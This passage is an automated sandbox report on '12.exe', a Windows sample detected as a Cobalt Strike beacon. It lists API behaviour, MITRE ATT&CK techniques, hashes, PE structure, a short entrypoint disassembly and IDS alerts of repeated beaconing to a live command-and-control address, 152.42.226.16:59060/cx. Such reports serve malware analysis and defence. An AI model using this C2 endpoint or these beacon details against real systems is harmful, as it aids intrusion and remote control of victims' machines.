                    Source: Yara matchFile source: Process Memory Space: 12.exe PID: 7324, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DBE272 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,0_2_00DBE272
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DBE442 GetCurrentProcessId,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00DBE442
                    Source: C:\Users\user\Desktop\12.exeCode function: GetLocaleInfoA,0_2_00DD5EF0
                    Source: C:\Users\user\Desktop\12.exeCode function: GetLocaleInfoA,0_2_00DD5EF0
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_0040161C CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle,0_2_0040161C
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_004019A0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004019A0
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DB7F09 GetUserNameA,GetComputerNameA,GetModuleFileNameA,_strrchr,GetVersionExA,__snprintf,0_2_00DB7F09
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DB7F09 GetUserNameA,GetComputerNameA,GetModuleFileNameA,_strrchr,GetVersionExA,__snprintf,0_2_00DB7F09
                    Source: C:\Users\user\Desktop\12.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Remote Access Functionality

                    barindex
                    Yara detected CobaltStrike
                    Source: Yara matchFile source: Process Memory Space: 12.exe PID: 7324, type: MEMORYSTR
                    Source: Yara matchFile source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 12.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.2.12.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.12.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DB85B7 socket,htons,ioctlsocket,closesocket,bind,listen,0_2_00DB85B7
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DB8699 htonl,htons,socket,closesocket,bind,ioctlsocket,0_2_00DB8699
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DBEDB3 socket,closesocket,htons,bind,listen,0_2_00DBEDB3
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DBEDB3 socket,closesocket,htons,bind,listen,0_2_00DBEDB3
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DB85B7 socket,htons,ioctlsocket,closesocket,bind,listen,0_2_00DB85B7
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DB8699 htonl,htons,socket,closesocket,bind,ioctlsocket,0_2_00DB8699

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure2
                    Valid Accounts                    		2
                    Native API                    		2
                    Valid Accounts                    		2
                    Valid Accounts                    		2
                    Valid Accounts                    		OS Credential Dumping1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		2
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading                    		21
                    Access Token Manipulation                    		112
                    Virtualization/Sandbox Evasion                    		LSASS Memory231
                    Security Software Discovery                    		Remote Desktop ProtocolData from Removable Media11
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Process Injection                    		21
                    Access Token Manipulation                    		Security Account Manager112
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive2
                    Ingress Tool Transfer                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    DLL Side-Loading                    		1
                    Process Injection                    		NTDS1
                    Process Discovery                    		Distributed Component Object ModelInput Capture1
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets1
                    Application Window Discovery                    		SSHKeylogging111
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Obfuscated Files or Information                    		Cached Domain Credentials1
                    Account Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading                    		DCSync1
                    System Owner/User Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                    File and Directory Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow14
                    System Information Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    12.exe95%ReversingLabsWin32.Trojan.CobaltStrike
                    12.exe100%AviraHEUR/AGEN.1344233
                    12.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://152.42.226.16:59060/cxj-v)0%Avira URL Cloudsafe
                    http://152.42.226.16:59060/cxS-i)0%Avira URL Cloudsafe
                    http://127.0.0.1:%u/0%Avira URL Cloudsafe
                    http://152.42.226.16:59060/cx26.16:59060/cx0%Avira URL Cloudsafe
                    152.42.226.160%Avira URL Cloudsafe
                    http://152.42.226.16:59060/cx0%Avira URL Cloudsafe
                    http://152.42.226.16:59060/cxA-0%Avira URL Cloudsafe
                    http://152.42.226.16:59060/cxwshqos.dll.muip0%Avira URL Cloudsafe
                    http://152.42.226.16:59060/cxwshqos.dll.mui0%Avira URL Cloudsafe
                    http://152.42.226.16:59060/cx1.0%Avira URL Cloudsafe
                    http://152.42.226.16:59060/cxmswsock.dll.muiW=L)0%Avira URL Cloudsafe
                    http://152.42.226.16:59060/cxN-0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://152.42.226.16:59060/cxtrue
                    • Avira URL Cloud: safe
                    		unknown
                    152.42.226.16true
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://152.42.226.16:59060/cxwshqos.dll.muip12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://152.42.226.16:59060/cx26.16:59060/cx12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://152.42.226.16:59060/cxS-i)12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://127.0.0.1:%u/12.exe, 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://152.42.226.16:59060/cx1.12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://152.42.226.16:59060/cxwshqos.dll.mui12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://152.42.226.16:59060/cxA-12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://152.42.226.16:59060/cxj-v)12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://152.42.226.16:59060/cxmswsock.dll.muiW=L)12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://152.42.226.16:59060/cxN-12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    152.42.226.16
                    		unknownUnited States
                    		81NCRENUStrue

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1581039
                    Start date and time:2024-12-26 19:27:05 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 15s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:12.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 35
                    • Number of non-executed functions: 160
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • VT rate limit hit for: 12.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    13:27:57API Interceptor11235564x Sleep call for process: 12.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    152.42.226.167W3KSFhWbw.elfGet hashmaliciousUnknownBrowse
                      3K6iey8Gan.elfGet hashmaliciousUnknownBrowse
                        yA6XZfl1zU.elfGet hashmaliciousUnknownBrowse

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          NCRENUSxd.sh4.elfGet hashmaliciousMiraiBrowse
                          • 152.50.51.184
                          xd.mpsl.elfGet hashmaliciousMiraiBrowse
                          • 204.87.8.87
                          telnet.ppc.elfGet hashmaliciousUnknownBrowse
                          • 152.36.142.178
                          loligang.arm7.elfGet hashmaliciousMiraiBrowse
                          • 152.12.73.251
                          nklmpsl.elfGet hashmaliciousUnknownBrowse
                          • 152.28.215.100
                          arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                          • 152.9.28.133
                          arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                          • 198.86.164.26
                          spc.elfGet hashmaliciousMirai, MoobotBrowse
                          • 152.45.109.36
                          star.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                          • 152.10.107.176
                          https://shibe-rium.net/Get hashmaliciousUnknownBrowse
                          • 152.42.156.84

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          No created / dropped files found

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                          Entropy (8bit):6.737889780496197
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • VXD Driver (31/22) 0.00%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:12.exe
                          File size:324'096 bytes
                          MD5:c8c40c038a4a8541e0924520599d8c28
                          SHA1:295bb62eaf5f53f55d60f2f339a45cd7cd7aa82c
                          SHA256:cbc52ae56076b1e28cff760b662145425620ae4b6d400cc9446deec21d1aae4a
                          SHA512:76a4daccd65b67304942575cd47e8b63a658ba76d3be9a1a8977189538fb69bd22c9faa8b441fe1a5b355802afa0613c1c74b5e219360bfce5b447677e46e51c
                          SSDEEP:6144:niCnYE+pwcF84FHvr3JeYF+u5KyckoVuB31c1:iCnj+Y4FPUM+u57sG31c1
                          TLSH:E464CEB0D852E6E3C3885CB13D92FA57B7939B14013627EB892F948097F57A0CD4A74E
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......................".....................0....@..........................@......l......... ............................

                          File Icon

                          Icon Hash:90cececece8e8eb0

                          Static PE Info

                          General

                          Entrypoint:0x4014a0
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                          DLL Characteristics:
                          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                          TLS Callbacks:0x401b40, 0x401af0
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f6243a15fa8eee8ee96b5e1144d461f6

                          Entrypoint Preview

                          Instruction
                          sub esp, 0Ch
                          mov dword ptr [00450394h], 00000001h
                          call 00007F4AB506DA43h
                          add esp, 0Ch
                          jmp 00007F4AB506D1FBh
                          lea esi, dword ptr [esi+00000000h]
                          sub esp, 0Ch
                          mov dword ptr [00450394h], 00000000h
                          call 00007F4AB506DA23h
                          add esp, 0Ch
                          jmp 00007F4AB506D1DBh
                          lea esi, dword ptr [esi+00000000h]
                          sub esp, 1Ch
                          mov eax, dword ptr [esp+20h]
                          mov dword ptr [esp], eax
                          call 00007F4AB506E9CAh
                          test eax, eax
                          sete al
                          add esp, 1Ch
                          movzx eax, al
                          neg eax
                          ret
                          nop
                          nop
                          nop
                          push ebp
                          mov ebp, esp
                          sub esp, 18h
                          mov dword ptr [esp], 00401520h
                          call 00007F4AB506D523h
                          leave
                          ret
                          lea esi, dword ptr [esi+00000000h]
                          lea esi, dword ptr [esi+00h]
                          nop
                          ret
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          push ebp
                          mov ebp, esp
                          mov eax, dword ptr [ebp+08h]
                          pop ebp
                          jmp eax
                          push ebp
                          mov edx, dword ptr [0040302Ch]
                          mov ebp, esp
                          mov eax, dword ptr [ebp+08h]
                          test edx, edx
                          jle 00007F4AB506D573h
                          cmp dword ptr [00403030h], 00000000h
                          jle 00007F4AB506D56Ah
                          mov ecx, dword ptr [00451148h]
                          mov dword ptr [eax+edx], ecx
                          mov ecx, dword ptr [0045114Ch]
                          mov edx, dword ptr [00403030h]

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x510000x644.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x4f0300x18.rdata
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x5111c0xe0.idata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x1a440x1c0078084e5ca85835392a463f62abd5746cFalse0.5334821428571429data5.700340700341032IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .data0x30000x4bc6c0x4be0015647f750fd4bb141b4734a68d6d66f5False0.564453125dBase III DBT, version number 0, next free block index 10, 1st item "\206\270\324\021\242\273\324\021\242\273\324\021\242\273\324\021\242\273\324\021\242\273\324\021\242\273\324\021\214\317\261i\326\273\324\021w*\326\021\242\253\324\021\242)\326\021\242\277\324\021\242\273\324\021\242\273\324\021\242\273\324\021\202\273\324q\214\311\260p\326\332\324\021\203'\324\021\242\013\326\021\242%\324\021\242-\326\021\242\273\324\021\242\273\324\021\242\273\324\021\342\273\324Q\214\337\265e\303\273\324\021\342I\324\021\242\353\327\021\242\311\324"6.758593457994394IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rdata0x4f0000x6340x800667441c840a2c3ea7e1291acd47bf4c5False0.2275390625data4.495993508967327IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                          .bss0x500000x4280x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata0x510000x6440x8007d72908e4c68f22d444c4e664d88dda3False0.3544921875data4.2935353496828945IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .CRT0x520000x340x200a09a5f5fb4593e99cd0076e5f2fcec2eFalse0.072265625Matlab v4 mat-file (little endian) \200\031@, numeric, rows 4198688, columns 00.2711142780062829IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .tls0x530000x80x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                          Imports

                          DLLImport
                          KERNEL32.dllCloseHandle, ConnectNamedPipe, CreateFileA, CreateNamedPipeA, CreateThread, DeleteCriticalSection, EnterCriticalSection, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetProcAddress, GetStartupInfoA, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, LeaveCriticalSection, QueryPerformanceCounter, ReadFile, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualProtect, VirtualQuery, WriteFile
                          msvcrt.dll__getmainargs, __initenv, __lconv_init, __p__acmdln, __p__fmode, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _initterm, _iob, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, signal, sprintf, strlen, strncmp, vfprintf

                          Network Behavior

                          Suricata IDS Alerts

                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-12-26T19:28:01.174082+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449730152.42.226.1659060TCP
                          2024-12-26T19:28:04.065607+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449731152.42.226.1659060TCP
                          2024-12-26T19:28:07.008994+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449732152.42.226.1659060TCP
                          2024-12-26T19:28:09.938290+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449733152.42.226.1659060TCP
                          2024-12-26T19:28:13.024487+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449734152.42.226.1659060TCP
                          2024-12-26T19:28:15.921977+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449735152.42.226.1659060TCP
                          2024-12-26T19:28:18.852713+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449737152.42.226.1659060TCP
                          2024-12-26T19:28:21.863365+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449741152.42.226.1659060TCP
                          2024-12-26T19:28:24.767420+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449743152.42.226.1659060TCP
                          2024-12-26T19:28:27.658629+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449745152.42.226.1659060TCP
                          2024-12-26T19:28:30.587201+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449746152.42.226.1659060TCP
                          2024-12-26T19:28:33.469999+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449747152.42.226.1659060TCP
                          2024-12-26T19:28:36.381095+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449748152.42.226.1659060TCP
                          2024-12-26T19:28:39.298766+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449749152.42.226.1659060TCP
                          2024-12-26T19:28:42.220886+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449750152.42.226.1659060TCP
                          2024-12-26T19:28:45.126842+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449751152.42.226.1659060TCP
                          2024-12-26T19:28:48.127398+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449752152.42.226.1659060TCP
                          2024-12-26T19:28:51.077524+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449753152.42.226.1659060TCP
                          2024-12-26T19:28:53.995484+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449754152.42.226.1659060TCP
                          2024-12-26T19:28:56.948292+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449755152.42.226.1659060TCP
                          2024-12-26T19:28:59.893821+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449758152.42.226.1659060TCP
                          2024-12-26T19:29:02.785028+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449764152.42.226.1659060TCP
                          2024-12-26T19:29:05.752619+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449770152.42.226.1659060TCP
                          2024-12-26T19:29:08.643492+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449776152.42.226.1659060TCP
                          2024-12-26T19:29:11.534105+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449782152.42.226.1659060TCP
                          2024-12-26T19:29:14.424353+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449788152.42.226.1659060TCP
                          2024-12-26T19:29:17.315337+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449794152.42.226.1659060TCP
                          2024-12-26T19:29:20.206541+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449805152.42.226.1659060TCP
                          2024-12-26T19:29:23.112154+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449811152.42.226.1659060TCP
                          2024-12-26T19:29:26.230193+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449817152.42.226.1659060TCP
                          2024-12-26T19:29:29.189460+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449823152.42.226.1659060TCP
                          2024-12-26T19:29:32.105461+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449829152.42.226.1659060TCP
                          2024-12-26T19:29:35.046126+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449839152.42.226.1659060TCP
